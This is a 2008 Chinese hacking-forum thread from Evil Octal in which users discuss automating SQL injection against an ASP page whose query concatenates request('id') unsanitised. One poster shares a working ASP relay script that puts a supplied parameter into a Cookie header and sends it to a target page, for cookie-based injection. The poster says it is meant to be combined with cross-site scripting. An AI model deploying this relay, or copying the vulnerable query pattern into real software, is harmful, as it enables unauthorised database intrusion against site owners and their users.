议题作者：落叶纷飞
信息来源：邪恶八进制信息安全团队（www.eviloctal.com）

请问如何用ASP写自动注入脚本啊？

漏洞代码如：
......
select * from news where id = & request("id") &
......

该如何写自动注入脚本呢？

[ 本帖最后由 ring04h 于 2008-7-8 14:43 编辑 ]

没明白你的意思，何谓“自动注入”

你说的是自动防注入吧。。。

就是说，怎么写个脚本去对这个注入点进行注入啊？

欠钱弄过PHP的COOKIE注入程序，你可以把他那个拿过来改下，还是非要弄ASP的？？

引用:

原帖由 樱花浪子 于 2008-6-28 23:01 发表
欠钱弄过PHP的COOKIE注入程序，你可以把他那个拿过来改下，还是非要弄ASP的？？

哪里有啊？？给我个地址好么？谢谢了

晕，我只是想用asp来实现，用asp来实现应该要用到xmlhttp把？？

VBS可以实现，ASP发包太慢
不要说VBS和ASP没有区别
试试就知道了

花了几天时间终于弄了出来~~~

其实我的主要目的是能直接在web页面注射~~~

配合跨站用,嘿嘿

复制内容到剪贴板

代码:

<%
Str="id="&escape(request("FK"))
Url="http://localhost/test.asp"
response.write PostData(Url,Str)

Function PostData(PostUrl,PostCok)
  Dim Http
  Set Http = Server.CreateObject("msxml2.serverXMLHTTP")
  With Http
    .Open "GET",PostUrl,False
    .SetRequestHeader "Cookie",PostCok
    .Send
    PostData = .ResponseBody
  End With
  Set Http = Nothing
  PostData =bytes2BSTR(PostData)
End Function

Function bytes2BSTR(vIn)
  Dim strReturn
  Dim I, ThisCharCode, NextCharCode
  strReturn = ""
  For I = 1 To LenB(vIn)
    ThisCharCode = AscB(MidB(vIn, I, 1))
    If ThisCharCode < &H80 Then
      strReturn = strReturn & Chr(ThisCharCode)
    Else
      NextCharCode = AscB(MidB(vIn, I + 1, 1))
      strReturn = strReturn & Chr(CLng(ThisCharCode) * &H100 + CInt(NextCharCode))
      I = I + 1
    End If
  Next
  bytes2BSTR = strReturn
End Function
%>

不知道是不是LZ要的

问题已解决拉,不过还是谢谢楼上的兄弟~~~

有这么神奇吗 ASP还是没时间学

靠，这种垃圾贴就不该留下，大家都在帮他解决，他自己解决了就闪一边去了，不管怎么样，你也应该吧如何解决问题 写出来吧！！！

引用:

原帖由 hum2049 于 2008-7-10 17:03 发表
靠，这种垃圾贴就不该留下，大家都在帮他解决，他自己解决了就闪一边去了，不管怎么样，你也应该吧如何解决问题 写出来吧！！！

这位大佬，我会写点东西出来的

你起码也要给我个测试时间啊～～！！

晕～～